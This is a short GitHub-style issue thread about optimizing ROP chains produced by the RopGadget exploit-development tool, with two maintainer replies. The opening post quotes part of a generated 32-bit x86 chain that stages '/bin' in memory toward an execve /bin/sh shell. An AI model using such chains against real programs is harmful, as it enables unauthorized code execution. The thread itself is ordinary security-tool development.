Generate optimal rop gadgets

Question

Generate optimal rop gadgets

andrewg-felinemenace opened this issue 13 years ago · 2 comments

andrewg-felinemenace commented 13 years ago

                # execve /bin/sh generated by RopGadget v3.3
                p += pack("<I", 0x000e0096) # pop %edx | pop %ecx | pop %ebx | ret
                p += pack("<I", 0x42424242) # padding
                p += pack("<I", 0x00178020) # @ .data
                p += pack("<I", 0x42424242) # padding
                p += pack("<I", 0x000238df) # pop %eax | ret
                p += "/bin"
                p += pack("<I", 0x0006cc5a) # mov %eax,(%ecx) | ret
                p += pack("<I", 0x000e0096) # pop %edx | pop %ecx | pop %ebx | ret
                p += pack("<I", 0x42424242) # padding
                p += pack("<I", 0x00178024) # @ .data + 4
                p += pack("<I", 0x42424242) # padding
                p += pack("<I", 0x000238df) # pop %eax | ret

By moving one byte along the "pop %edx, pop %ecx, pop %ebx, ret" to just pop "%ecx, pop %ebx, ret" it will optimize the generated size.

Answer 1 · 2011-12-04T16:56:53.000Z

Yes that's right, I'll work on that. But it is complex/boring to optimize the ROP automation :/
So, thanks to report it, I'll work on that :)

Answer 2 · 2013-01-30T06:06:13.000Z

I'm not positive, but I think this issue is fixed in newer versions because the shorter gadgets are higher up on the list of the gadgets, so they should be used first if found.

Without a test case for this, it's really not possible to do anything about this.